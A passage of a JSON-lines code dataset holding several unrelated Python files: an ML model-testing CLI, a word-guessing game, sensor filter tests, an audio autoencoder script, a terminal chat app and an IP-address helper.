get_recursive_files(folder, r\"[0-9]+_.+\\.py$\")\n module_names = config_model_list()\n module_names.sort()\n print(module_names)\n failed_scripts = []\n\n for module_name in module_names:\n print(\"#######################\")\n print(module_name)\n test(module_name)\n\n\ndef test(modelname):\n print(modelname)\n try:\n module = module_load(modelname, verbose=1)\n print(module)\n module.test()\n del module\n except Exception as e:\n print(\"Failed\", e)\n\n\ndef test_global(modelname):\n print(modelname)\n try:\n module = module_load(modelname, verbose=1)\n print(module)\n module.test()\n del module\n except Exception as e:\n print(\"Failed\", e)\n\n\ndef test_api(model_uri=\"model_xxxx/yyyy.py\", param_pars=None):\n log(\"############ Model preparation ##################################\")\n from mlmodels.models import module_load_full\n from mlmodels.models import fit as fit_global\n from mlmodels.models import predict as 
predict_global\n from mlmodels.models import save as save_global, load as load_global\n\n\n log(\"#### Module init ############################################\")\n from mlmodels.models import module_load\n module = module_load(model_uri)\n log(module)\n\n\n log(\"#### Loading params ##############################################\")\n model_pars, data_pars, compute_pars, out_pars = get_params(module, param_pars)\n\n\n log(\"#### Model init ############################################\")\n session = None\n from mlmodels.models import model_create\n model = model_create(module, model_pars, data_pars, compute_pars)\n\n module, model = module_load_full(model_uri, model_pars, data_pars, compute_pars)\n\n\n log(\"############ Model fit ##########################################\")\n model, sess = fit_global(module, model, sess=None, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars)\n print(\"fit success\", sess)\n\n\n log(\"############ Prediction############################################\")\n ### Load model, and predict \n preds = predict_global(module, model, session, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars)\n print(preds)\n\n\n log(\"############ Save/ Load ############################################\")\n # save_global( save_pars, model, sess)\n # load_global(save_pars)\n\n\n\ndef test_module(model_uri=\"model_xxxx/yyyy.py\", param_pars=None):\n # Using local method only\n\n log(\"#### Module init ############################################\")\n from mlmodels.models import module_load\n module = module_load(model_uri)\n log(module)\n\n log(\"#### Loading params ##############################################\")\n #param_pars = {\"choice\":pars_choice, \"data_path\":data_path, \"config_mode\": config_mode}\n model_pars, data_pars, compute_pars, out_pars = module.get_params(param_pars)\n\n\n log(\"#### Model init ############################################\")\n model = module.Model(model_pars, data_pars, compute_pars)\n log(model)\n\n log(\"#### Fit ########################################################\")\n model, sess = module.fit(model, data_pars, compute_pars, out_pars)\n\n log(\"#### Predict ####################################################\")\n ypred = module.predict(model, sess, data_pars, compute_pars, out_pars)\n print(ypred)\n\n log(\"#### Get metrics ################################################\")\n metrics_val = module.fit_metrics(model, data_pars, compute_pars, out_pars)\n\n log(\"#### Save ########################################################\")\n # save_pars = {}\n # load_pars = {}\n # module.save( save_pars, model, sess)\n\n log(\"#### Load ########################################################\") \n # model2, sess2 = module.load(load_pars)\n # ypred = predict(model2, data_pars, compute_pars, out_pars)\n # metrics_val = metrics(model2, ypred, data_pars, compute_pars, out_pars)\n # print(model2)\n\n\n\n####################################################################################################\n############ JSON template #########################################################################\ndef config_get_pars(config_file, config_mode=\"test\"):\n \"\"\"\n load JSON and output the params\n \"\"\"\n js = json.load(open(config_file, 'r')) # Config\n js = js[config_mode] # test /uat /prod\n model_p = js.get(\"model_pars\")\n data_p = js.get(\"data_pars\")\n compute_p = js.get(\"compute_pars\")\n out_p = js.get(\"out_pars\")\n\n return model_p, data_p, compute_p, out_p\n\n\ndef config_generate_json(modelname, 
to_path=\"ztest/new_model/\"):\n \"\"\"\n Generate config file from code source\n config_init(\"model_tf.1_lstm\", to_folder=\"ztest/\")\n\n \"\"\"\n os.makedirs(to_path, exist_ok=True)\n ##### JSON file\n import inspect\n module = module_load(modelname)\n signature = inspect.signature(module.Model)\n args = {\n k: v.default if v.default is not inspect.Parameter.empty else None\n for k, v in signature.parameters.items()\n # if v.default is not inspect.Parameter.empty\n }\n\n # args = inspect.getargspec(module.Model)\n model_pars = {\"model_pars\": args,\n \"data_pars\": {},\n \"compute_pars\": {},\n \"out_pars\": {}\n }\n\n modelname = modelname.replace(\".py\", \"\").replace(\".\", \"-\")\n fname = os.path.join(to_path, f\"{modelname}_config.json\")\n json.dump(model_pars, open(fname, mode=\"w\"))\n print(fname)\n\n\n\ndef os_folder_copy(src, dst):\n \"\"\"Copy a directory structure overwriting existing files\"\"\"\n import shutil\n for root, dirs, files in os.walk(src):\n if not os.path.isdir(root):\n os.makedirs(root)\n\n for file in files:\n rel_path = root.replace(src, '').lstrip(os.sep)\n dest_path = os.path.join(dst, rel_path)\n\n if not os.path.isdir(dest_path):\n os.makedirs(dest_path, exist_ok=True)\n\n try :\n shutil.copyfile(os.path.join(root, file), os.path.join(dest_path, file))\n except Exception as e :\n print(e)\n\n\n\ndef config_init(to_path=\".\"):\n \"\"\"\n Generate template from code source\n config_init(\"model_tf.1_lstm\", to_folder=\"ztest/\")\n \"\"\"\n import shutil\n os_root = os_package_root_path()\n\n to_path = os_root + \"/ztest/current/\" if to_path == \".\" else to_path\n log(\"Working Folder\", to_path)\n # os.makedirs(to_path, exist_ok=True)\n\n os_folder_copy(os_root + \"/template/\", to_path + \"/template/\")\n os_folder_copy(os_root + \"/dataset/\", to_path + \"/dataset/\")\n os_folder_copy(os_root + \"/example/\", to_path + \"/example/\")\n \n os.makedirs(to_path + \"model_trained\", exist_ok=True)\n os.makedirs(to_path + \"model_code\", exist_ok=True)\n \n\n #### Config files\n path_user = os.path.expanduser('~')\n path_config = path_user + \"/.mlmodels/config.json\"\n #print(\"config file\", path_config)\n\n os.makedirs(path_user + \"/.mlmodels/\" , exist_ok=True)\n ddict = { \"model_trained\" : to_path + \"/model_trained/\", \n \"dataset\" : to_path + \"/dataset/\", }\n log(\"Config values\", ddict)\n json.dump( ddict, open(path_config, mode=\"w\") )\n\n\n from mlmodels.util import config_path_pretrained, config_path_dataset\n log(\"Config path\", get_pretrained_path() )\n\n\n\n\n\n\n\n\n\n\ndef config_model_list(folder=None):\n # Get all the model.py into folder\n folder = os_package_root_path() if folder is None else folder\n # print(folder)\n module_names = get_recursive_files(folder, r'/*model*/*.py')\n mlist = []\n for t in module_names:\n mlist.append(t.replace(folder, \"\").replace(\"\\\\\", \".\"))\n print(mlist[-1])\n\n return mlist\n\n\n\n\n####################################################################################################\n############CLI Command ############################################################################\ndef cli_load_arguments(config_file=None):\n \"\"\"\n Load CLI input, load config.toml , overwrite config.toml by CLI Input\n \"\"\"\n if config_file is None:\n cur_path = os.path.dirname(os.path.realpath(__file__))\n config_file = os.path.join(cur_path, \"template/models_config.json\")\n # print(config_file)\n\n p = argparse.ArgumentParser()\n\n def add(*w, **kw):\n p.add_argument(*w, **kw)\n\n 
add(\"--config_file\", default=config_file, help=\"Params File\")\n add(\"--config_mode\", default=\"test\", help=\"test/ prod /uat\")\n add(\"--log_file\", default=\"mlmodels_log.log\", help=\"log.log\")\n add(\"--do\", default=\"test\", help=\"do \")\n add(\"--folder\", default=None, help=\"folder \")\n\n\n add(\"--init\", default=\"\", help=\".\")\n\n ##### model pars\n add(\"--model_uri\", default=\"model_tf/1_lstm.py\", help=\".\")\n add(\"--load_folder\", default=\"ztest/\", help=\".\")\n\n ##### data pars\n add(\"--dataname\", default=\"dataset/google.csv\", help=\".\")\n\n ##### compute pars\n\n ##### out pars\n add(\"--save_folder\", default=\"ztest/\", help=\".\")\n\n arg = p.parse_args()\n # arg = load_config(arg, arg.config_file, arg.config_mode, verbose=0)\n return arg\n\n\ndef main():\n arg = cli_load_arguments()\n print(arg.do)\n\n\n if len(arg.init) > 0 :\n config_init( to_path= arg.init )\n return 0\n\n\n if arg.do == \"generate_config\":\n log(arg.save_folder)\n config_generate_json(arg.model_uri, to_path=arg.save_folder)\n\n\n ###################################################################\n if arg.do == \"model_list\": # list all models in the repo\n l = config_model_list(arg.folder)\n\n\n if arg.do == \"testall\":\n # test_all() # tot test all te modules inside model_tf\n test_all(folder=None)\n\n\n if arg.do == \"test\":\n param_pars = {\"choice\": \"test01\", \"data_path\": \"\", \"config_mode\": \"test\"}\n test_module(arg.model_uri, param_pars=param_pars) # '1_lstm'\n\n test(arg.model_uri) # '1_lstm'\n # test_api(arg.model_uri) # '1_lstm'\n test_global(arg.model_uri) # '1_lstm'\n\n\n if arg.do == \"fit\":\n model_p, data_p, compute_p, out_p = config_get_pars(arg.config_file, arg.config_mode)\n\n module = module_load(arg.model_uri) # '1_lstm.py\n model = model_create(module, model_p, data_p, compute_p) # Exact map JSON and paramters\n\n log(\"Fit\")\n model, sess = module.fit(model, data_pars=data_p, compute_pars=compute_p, out_pars=out_p)\n\n log(\"Save\")\n save_pars = {\"path\": f\"{arg.save_folder}/{arg.model_uri}\", \"model_uri\": arg.model_uri}\n save(save_pars, model, sess)\n\n if arg.do == \"predict\":\n model_p, data_p, compute_p, out_p = config_get_pars(arg.config_file, arg.config_mode)\n # module = module_load(arg.modelname) # '1_lstm'\n load_pars = {\"path\": f\"{arg.save_folder}/{arg.model_uri}\", \"model_uri\": arg.model_uri}\n\n module = module_load(model_p[\".model_uri\"]) # '1_lstm.py\n model, session = load(load_pars)\n module.predict(model, session, data_pars=data_p, compute_pars=compute_p, out_pars=out_p)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"mlmodels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618496311","text":"import random\n\n\nclass MysteryWord:\n\n default_dictionary = \"/usr/share/dict/words\"\n\n def __init__(self, file=default_dictionary, difficulty=0):\n \"\"\"Initializes and instance of the game. 
Loads the dictionary file,\n asks user for difficulty, selects a word from the dictionary based\n on difficulty level, sets number of guesses, splits the word into\n a list of tuples containing the letter plus \"FALSE\" value indicating\n that the letter has not been guessed by the player.\"\"\"\n\n word_list = self.load_dictionary(file)\n self.word = self.choose_word(word_list, difficulty).upper()\n self.word_length = len(self.word)\n self.prepared_word = self.prepare_word_for_game()\n self.remaining_guesses = 8\n self.guessed_letters = []\n\n def __str__(self):\n word_status_string = \"\"\n for letter in self.prepared_word:\n if letter[1]:\n word_status_string += \" {}\".format(letter[0])\n else:\n word_status_string += \" _\"\n\n return word_status_string\n\n def check_guess(self, player_guess):\n \"\"\" Compares the player's guess to the word to guess.\"\"\"\n player_guess = player_guess.upper()\n\n if player_guess == \"QUIT\":\n exit()\n elif not player_guess.isalpha() or len(player_guess) > 1:\n return -1\n elif player_guess in self.guessed_letters:\n return -2\n elif player_guess in self.word:\n for letter in self.prepared_word:\n if player_guess == letter[0]:\n letter[1] = True\n self.guessed_letters.append(player_guess)\n return 1\n else:\n self.guessed_letters.append(player_guess)\n self.remaining_guesses -= 1\n return 0\n\n def check_win_lose(self):\n \"\"\" Checks to see if the player has won or lost the game \"\"\"\n\n if not self.remaining_guesses:\n return 1\n elif False not in [element[1] for element in self.prepared_word]:\n return 2\n return 0\n\n def choose_word(self, word_list, difficulty):\n \"\"\" Chooses a random word from the provided word_list list and returns\n the word \"\"\"\n if difficulty == 1:\n while True:\n word = random.choice(word_list)\n if 4 <= len(word) <= 6:\n return word\n elif difficulty == 2:\n while True:\n word = random.choice(word_list)\n if 6 <= len(word) <= 10:\n return word\n elif difficulty == 3:\n while True:\n word = random.choice(word_list)\n if len(word) >= 10:\n return word\n else:\n return random.choice(word_list)\n\n def load_dictionary(self, file):\n \"\"\"Loads the dictionary file from the specified location, file should\n be in the format one word per line in the file\"\"\"\n try:\n with open(file, \"r\") as dictionary_file:\n word_list = dictionary_file.read().split()\n return word_list\n except IOError:\n file = self.default_dictionary\n return self.load_dictionary(file)\n\n def prepare_word_for_game(self):\n \"\"\" Prepares the word for used by the game by splitting the word into\n a list of tuples. 
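        The same masking idea as a standalone sketch (mask_word is an assumed
        name, not part of this class):

            def mask_word(word, guessed_letters):
                return " ".join(
                    c if c in guessed_letters else "_" for c in word.upper()
                )

            # mask_word("python", {"P", "O"}) -> 'P _ _ _ O _'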
Each tuple contains a letter from the word, plus\n a boolean value indicating if the player has guessed that letter.\"\"\"\n prepared_word = []\n for pair in zip(self.word,\n [False for letters in range(len(self.word))]):\n prepared_word.append(list(pair))\n return prepared_word\n","sub_path":"legacy/mystery_word27.py","file_name":"mystery_word27.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618545666","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib64/python3.6/site-packages/ioflo/trim/interior/plain/test/testFiltering.py\n# Compiled at: 2017-12-17 08:35:26\n# Size of source mod 2**32: 2092 bytes\n\n\ndef TestTemperature():\n \"\"\" \"\"\"\n storing.Store.Clear()\n doing.Doer.Clear()\n store = storing.Store(name='Test')\n print('\\nTesting Temperature Filter')\n filter = TemperatureSensorFilter(name='filterSensorTemp', store=store, group='filter.sensor.temperature',\n output='state.temperature',\n input='ctd',\n depth='state.depth',\n parms=dict(window=60.0, frac=0.9, preload=10.0, layer=40.0,\n tolerance=5.0))\n output = store.fetch('state.temperature').update(value=10.0)\n output = store.fetch('state.depth').update(value=40.0)\n store.expose()\n filter._expose()\n for k in range(1, 300):\n print('')\n store.advanceStamp(0.125)\n s = 10.0 + 2.0 * math.sin(math.pi * 2.0 * k / 300.0)\n input = store.fetch('ctd').update(temperature=s)\n filter.update()\n filter._expose()\n print(s)\n\n\ndef TestSalinity():\n \"\"\" \"\"\"\n storing.Store.Clear()\n doing.Doer.Clear()\n store = storing.Store(name='Test')\n print('\\nTesting Salinity Filter')\n filter = SalinitySensorFilter(name='filterSensorSalinity', store=store, group='filter.sensor.salinity',\n output='state.salinity',\n input='ctd.salinity',\n parms=dict(window=60.0, frac=0.9))\n output = store.fetch('state.salinity').update(value=32.0)\n store.expose()\n filter._expose()\n for k in range(1, 300):\n print('')\n store.advanceStamp(0.125)\n s = 32.0 + 2.0 * math.sin(math.pi * 2.0 * k / 300.0)\n input = store.fetch('ctd.salinity').update(value=s)\n filter.update()\n filter._expose()\n\n\ndef Test():\n \"\"\"Module Common self test\n\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n Test()","sub_path":"pycfiles/ioflo-py3.6-dev-1.7.5.linux-x86_64.tar/testFiltering.cpython-36.py","file_name":"testFiltering.cpython-36.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553486432","text":"#!/usr/bin/env python\n\nimport VRAE\nimport wave\nimport numpy as np\nimport pylab as pl\nimport theano\n\nfrom scipy.io import wavfile as wavfile\nfrom sklearn.feature_extraction.image import extract_patches_2d\n\nhidden_units_encoder = 500\nhidden_units_decoder = hidden_units_encoder\nfeatures = 1\nlatent_variables = 100\nb1 = 0.05\nb2 = 0.001\nlearning_rate = 1e-3\nsigma_init = 1e-3\nbatch_size = 1\n\n\nvrae = VRAE.VRAE(hidden_units_encoder, hidden_units_decoder, features, latent_variables, b1, b2, learning_rate, sigma_init, batch_size)\n\n(wavrate, wavdata) = wavfile.read(\"19_this_is_an_idea.wav\")\n\nwavdata = np.atleast_2d(wavdata[:10000])\n# wavdata = wavdata.reshape((1, wavdata.shape[0], wavdata.shape[1]))\nprint(\"wavdata.shape\", wavdata.shape)\n\n# patch_size = (64, 1)\n# data = extract_patches_2d(wavdata[:,:], patch_size, 
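# (Aside on the ioflo sensor filters exercised above: window/frac parameterize
# smoothing of a noisy series, and the essential operation is a one-line
# exponential filter. A hedged sketch, independent of ioflo's actual classes:
#
#     def smooth(samples, frac=0.9):
#         out, y = [], samples[0]
#         for s in samples[1:]:
#             y = frac * y + (1.0 - frac) * s
#             out.append(y)
#         return out
#
# A frac near 1 trusts history and smooths hard; near 0 it tracks new samples.)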
max_patches=None)\n# data = data.reshape(data.shape[0], -1)\nwavlen = wavdata.shape[1]\nchunklen = 1\nnumchunks = wavlen/chunklen\ndata = wavdata[0,:numchunks*chunklen].reshape((1, chunklen, numchunks))\n# data = wavdata[0,:numchunks*chunklen].reshape((chunklen, numchunks))\nprint(\"data.shape\", data.shape)\n\n\nprint(\"create_gradientfunctions\")\ndata = data.astype(np.float64)\ntdata = theano.shared(data)\nvrae.create_gradientfunctions(tdata)\n\nprint(\"save_parameters\")\nvrae.save_parameters(\"data/\")\n\nprint(\"encoding\")\nz, mu_encoder, log_sigma_encoder = vrae.encode(data[0,:1].T)\n\nprint(\"z.shape, z, mu_enc, s_enc\", z.shape, mu_encoder, log_sigma_encoder)\nnp.save(\"z.npy\", z)\n\npl.plot(z)\npl.show()\n\nprint(\"decoding\")\nx = vrae.decode(1000, latent_variables, z)\nprint(\"x.shape, x\", x.shape, x)\n\npl.plot(x)\npl.show()\n\nwavfile.write(\"x.wav\", 44100, x)\n","sub_path":"nnet/keeper_VRAE-y0ast-x75-fork-theano/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230097330","text":"# -*- coding: utf-8 -*-\nimport datetime, json, random, os, threading, time\n\nEXIT = \"exit\"\n# Take a look at the structure of the config variable below (line 5): a dictionary is a handy data type that lets one variable store many things as a tree structure, easily accessed by node name or by iterating the nested arrays inside\nconfig = {\n    \"s_prompt_word\": \"> \",\n    \"program\": {\n        \"user\": {\n            \"database\": {\n                \"path\": \"./user.json\"\n            }\n        },\n        \"chat\": {\n            \"banner\": {\n                \"format\": {\n                    \"username\": [\n                        \"Welcome {} ^-^\",\n                        \"Glad you're back, {} !!\"\n                    ]\n                }\n            }\n        }\n    },\n    \"history\": {\n        \"path\": \"./history.json\"\n    },\n    \"mailboxs\": {\n        'path': 'mailboxs'\n    }\n}\nMAIN_PROGRAM_PATH = os.path.dirname(os.path.abspath(__file__))\nMAILBOXS_PATH = os.path.join(MAIN_PROGRAM_PATH, config['mailboxs']['path'])\nif not os.path.exists(MAILBOXS_PATH):\n    os.makedirs(MAILBOXS_PATH)\n\n# utilities\ndef identify(var, tag=None):\n    tag_presentation = \"\"\n    if tag:\n        tag_presentation = \"At {} identify that\".format(tag)\n    if type(var) is list:\n        print(tag_presentation, \"Array len\", len(var), \"is\", var)\n    else:\n        print(tag_presentation, type(var), var)\n\ndef get_json_element(dic, *element_maps):\n    result = []\n    for maps in element_maps:\n        if type(maps) is list:\n            pointer = dic\n            for property in maps:\n                pointer = pointer[property]\n            element = pointer\n        else:\n            property = maps\n            element = dic[property]\n        result.append(element)\n    return tuple(result)\n\n# file operators\ndef tail(file_reader, n, k=0):  # seek to the last n lines of the file, then read k lines from there\n    assert n >= 0, \"Number of tail lines must be a positive integer\"\n    assert k <= n, \"Can't read {} lines from last {} lines\".format(k,n)\n    k = n if not k else k\n    pos, lines = n+1, []\n    while len(lines) <= n:\n        try:\n            file_reader.seek(-pos, 2)\n        except IOError:\n            file_reader.seek(0)\n            break\n        finally:\n            lines = list(file_reader)\n        pos *= 2\n    return lines[-n:-(n-k)] if k < n else lines[-n:]\n\n\nclass Message():\n    def __init__(self, in_program, from_user, to_user, message):\n        # create temp attributes\n        self.current_program = in_program\n        self.user = from_user\n        self.to_user = to_user\n        self.content = None\n        self.time = datetime.datetime.fromtimestamp(0)\n        # assign attributes\n        if message:\n            self.content = message\n            self.time = datetime.datetime.utcnow().timestamp()\n            self.buildup()\n            self.store()\n    def __str__(self):\n        
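        # (On the tail() helper above: collections.deque reproduces the same
        # "last n lines" behaviour without manual seek arithmetic; a hedged
        # alternative sketch, tail_lines being an assumed name:
        #     from collections import deque
        #     def tail_lines(path, n):
        #         with open(path) as f:
        #             return list(deque(f, maxlen=n))
        # deque with maxlen streams the file once, keeping only the newest n.)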
return self.content\n def buildup(self):\n self.summary = json.dumps({\n \"from\": self.user.username,\n \"from_name\" : self.user.name,\n \"to\": self.to_user.username,\n \"to_name\" : self.to_user.name,\n \"message\": self.content,\n \"time\": self.time\n })\n def store(self):\n self.user.deliver_message(self.summary)\n self.to_user.deliver_message(self.summary)\n \nclass User():\n def __init__(self, d_user_data):\n self.name = d_user_data['name']\n self.username = d_user_data['username']\n self.role = d_user_data['role']\n self.mailbox = os.path.join(MAILBOXS_PATH,d_user_data['mailbox'])\n self.test_mailbox()\n \n def test_mailbox(self):\n mode = 'a' if os.path.exists(self.mailbox) else 'w'\n open(self.mailbox, mode).close()\n def deliver_message(self, summary_json_dumped):\n mode = 'a' if os.path.exists(self.mailbox) else 'w'\n with open(self.mailbox, mode) as mailbox_writer:\n mailbox_writer.writelines([summary_json_dumped + \"\\n\"])\nclass UserManager():\n def __init__(self):\n self.all_user = {}\n self.all_user_name = {}\n self.load_users()\n def load_users(self):\n with open(config['program']['user']['database']['path'], 'r') as user_database:\n self.all_user = json.load(user_database)['lauchat']\n self.all_user_name = [\n list(get_json_element(user, ['username'], ['data', 'name'], ['data', 'mailbox'], ['data', 'role']))\n for user in self.all_user\n ]\n def find_friend(self, name):\n for user in self.all_user_name:\n if name == user[0] or name == user[1]:\n return {\"username\": user[0], \"name\": user[1], 'mailbox': user[2], 'role': user[3]}\n return None\n def authenticate(self, username, password):\n self.load_users()\n for user in self.all_user:\n usern, passwd, userdata = get_json_element(user, ['username'], ['password'], ['data'])\n if usern == username and password == passwd:\n userdata['username'] = usern\n return User(userdata)\n else:\n continue\n return False\n\nclass Program():\n def __init__(self):\n self.Commands = {\n \"exit\": {\n \"do\": self.set_exit,\n \"description\": \"Exit app\"\n },\n \"commands\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"help\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n }\n }\n self.current_program = Program\n self.exit_signal = False\n self.run()\n def print_commands(self):\n print(\"\\n{} commands\\n\".format(self.__class__.__name__)+\n \"\\n\".join([\"{}: {}\".format(command,command_info['description']) for command, command_info in self.Commands.items()])+\n \"\\n\")\n return False\n def set_exit(self):\n self.exit_signal = True\n return True\n def get_keyboard_input(self, prompt):\n message = input(prompt)\n #print(message in self.Commands, self.Commands)\n if message in self.Commands:\n command = message\n action = self.Commands[command]['do']\n return action()\n else:\n return message\n def run(self):\n while not self.exit_signal:\n self.user_manager = UserManager()\n authenticated = False\n while not authenticated:\n print(\"Login\")\n username = self.get_keyboard_input(\"Username: \")\n #print(\"exit signal\", self.exit_signal)\n if not self.exit_signal:\n if username:\n authenticated = self.user_manager.authenticate(username, input(\"Password: \"))\n if not authenticated:\n print(\"Wrong user credentials, retry another.\\n\")\n else:\n break\n if not self.exit_signal:\n self.session = Chat( authenticated, self.user_manager)\n program_exit_code = self.session.run()\n if program_exit_code == \"close\":\n break\n \n @staticmethod\n def 
notification_agent(program_chat):\n print(\"Enable notification for {}\".format(program_chat.user.name))\n last_message = {}\n while not program_chat.is_logout and not program_chat.exit_signal:\n with open(program_chat.user.mailbox, 'r') as mailbox_reader:\n last_lines = tail(mailbox_reader, 1)\n if len(last_lines): # history exsist\n # print(last_lines)\n new_message = json.loads(last_lines[0])\n if new_message['from'] != program_chat.user.username and new_message != last_message:\n last_message = new_message\n Chat.print_history_message(new_message)\n else: # new mailbox, no history\n pass # dont do anything\n time.sleep(1)\n print(\"Close notification for\", program_chat.user.name)\n return 0 # return to close thread after logout\nclass Chat(Program):\n @staticmethod\n def print_history_message(message):\n print(\"[{}:{}]>{}\".format(datetime.datetime.fromtimestamp(message['time']), message['from_name'], message['message']))\n def __init__(self, user, usermgr):\n self.Commands = {\n \"logout\": {\n \"do\": self.set_logout,\n \"description\": \"Logout for new session.\"\n },\n \"exit\": {\n \"do\": self.set_exit,\n \"description\": \"Exit app.\"\n },\n \"send to\": {\n \"do\": self.set_destination,\n \"description\": \"Set receiver.\"\n },\n \"commands\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"help\": {\n \"do\": self.print_commands,\n \"description\": \"Print this help\"\n },\n \"history\": {\n \"do\": self.load_history,\n \"description\": \"Read history on conversation\"\n }, \n \"reply\": {\n \"do\": self.reply,\n \"description\": \"Reply last sent message\"\n }, \n }\n self.usermgr = usermgr\n self.user = user\n self.current_program = Chat\n self.exit_signal = False\n self.is_logout = False\n self.destination_user = None\n \n def load_history(self):\n n_load = max(int(input(\"History length: \")), 1)\n history = []\n n = 0\n with open(self.user.mailbox, 'r') as my_mailbox_reader:\n all_mails = my_mailbox_reader.readlines()\n all_mails.reverse()\n for line in all_mails:\n message = json.loads(line)\n if [self.user.name, self.destination_user.name].sort() == [message['from'], message['to']].sort():\n history.append(message)\n n += 1\n if n == n_load:\n break\n history.reverse()\n for message in history:\n Chat.print_history_message(message)\n def reply(self):\n with open(self.user.mailbox, 'r') as my_mailbox_reader:\n l_last_mail = tail(my_mailbox_reader, 1)\n if l_last_mail:\n last_message = json.loads(l_last_mail[0])\n to_user = last_message['from'] if last_message['from'] != self.user.username else last_message['to']\n self.set_destination(to_user)\n else:\n print(\"No previous message to reply\")\n \n def set_destination(self, to_user=None):\n to_user = input(\"Send to: \") if not to_user else to_user\n result = self.usermgr.find_friend(to_user)\n if result:\n self.destination_user = User(result)\n if self.destination_user.name == self.user.name:\n print(\"To yourself\\n\")\n else:\n print(\"To {}\\n\".format(to_user))\n else:\n print(to_user, 'not found')\n def set_logout(self):\n self.is_logout = True\n self.exit_signal = True\n def show_banner(self):\n all_banners = config['program']['chat']['banner']['format']['username']\n banner = random.choice(all_banners)\n print(banner.format(self.user.name) + '\\n')\n def run(self):\n self.show_banner()\n noti_thread = threading.Thread(target=Program.notification_agent, args=(self,))\n noti_thread.start()\n noti_thread.join(0)\n self.set_destination(self.user.username)\n while not 
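        # (A stop-flag sketch for the polling notifier above: threading.Event
        # replaces the is_logout/exit_signal attribute checks and folds the
        # one-second sleep into a single call:
        #     stop = threading.Event()
        #     while not stop.wait(timeout=1.0):
        #         check_mailbox()          # illustrative callback name
        # stop.set() from another thread ends the loop on its next tick.)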
self.exit_signal:\n content = self.get_keyboard_input(config['s_prompt_word'])\n if self.exit_signal:\n continue\n else:\n Message(self, self.user, self.destination_user, content)\n print(\"Bye {}.\\n\".format(self.user.name))\n return \"logout\" if self.is_logout else \"close\"\n \n\n# main app here\nif __name__ == \"__main__\":\n Program()\n","sub_path":"HSGSchat/appchat.py","file_name":"appchat.py","file_ext":"py","file_size_in_byte":12255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632377090","text":"\"\"\"Simple utility for building a list of local IPs using the socket module.\nThis module defines two constants:\n\nLOCALHOST : The loopback interface, or the first interface that points to this\n machine. It will *almost* always be '127.0.0.1'\n\nLOCAL_IPS : A list of IP addresses, loopback first, that point to this machine.\n\nPUBLIC_IPS : A list of public IP addresses that point to this machine.\n Use these to tell remote clients where to find you.\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (C) 2010-2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. The full license is in\n# the file COPYING, distributed as part of this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport socket\n\nfrom .data import uniq_stable\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\nLOCAL_IPS = []\nPUBLIC_IPS = []\n\nLOCALHOST = '127.0.0.1'\n\ndef _only_once(f):\n \"\"\"decorator to only run a function once\"\"\"\n f.called = False\n def wrapped():\n if f.called:\n return\n ret = f()\n f.called = True\n return ret\n return wrapped\n\ndef _requires_ips(f):\n \"\"\"decorator to ensure load_ips has been run before f\"\"\"\n def ips_loaded(*args, **kwargs):\n _load_ips()\n return f(*args, **kwargs)\n return ips_loaded\n\n@_only_once\ndef _load_ips():\n \"\"\"load the IPs that point to this machine\n \n This function will only ever be called once.\n \"\"\"\n global LOCALHOST\n try:\n LOCAL_IPS[:] = socket.gethostbyname_ex('localhost')[2]\n except socket.error:\n pass\n \n try:\n hostname = socket.gethostname()\n PUBLIC_IPS[:] = socket.gethostbyname_ex(hostname)[2]\n # try hostname.local, in case hostname has been short-circuited to loopback\n if not hostname.endswith('.local') and all(ip.startswith('127') for ip in PUBLIC_IPS):\n PUBLIC_IPS[:] = socket.gethostbyname_ex(socket.gethostname() + '.local')[2]\n except socket.error:\n pass\n finally:\n PUBLIC_IPS[:] = uniq_stable(PUBLIC_IPS)\n LOCAL_IPS.extend(PUBLIC_IPS)\n\n # include all-interface aliases: 0.0.0.0 and ''\n LOCAL_IPS.extend(['0.0.0.0', ''])\n\n LOCAL_IPS[:] = uniq_stable(LOCAL_IPS)\n\n LOCALHOST = LOCAL_IPS[0]\n\n@_requires_ips\ndef local_ips():\n \"\"\"return the IP addresses that point to this machine\"\"\"\n return LOCAL_IPS\n\n@_requires_ips\ndef public_ips():\n \"\"\"return the IP addresses for this machine that are visible to other machines\"\"\"\n return PUBLIC_IPS\n\n@_requires_ips\ndef localhost():\n \"\"\"return ip for localhost (almost always 127.0.0.1)\"\"\"\n return LOCALHOST\n\n@_requires_ips\ndef is_local_ip(ip):\n \"\"\"does `ip` point to this 
